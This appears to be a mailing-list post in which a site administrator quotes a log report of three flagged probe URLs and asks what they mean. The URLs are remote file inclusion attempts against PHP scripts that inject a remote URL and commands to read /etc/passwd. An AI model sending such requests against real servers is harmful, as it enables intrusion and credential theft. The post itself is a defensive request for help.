I found the following in my log this morning. Does anybody know what it
really means? Thanks.
A total of 3 possible successful probes were detected (the following URLs
contain strings that match one or more of a listing of strings that
indicate a possible exploit):
/user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd
HTTP Response 302
/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt?
HTTP Response 302
/gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd
HTTP Response 302
--
Knute Johnson
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
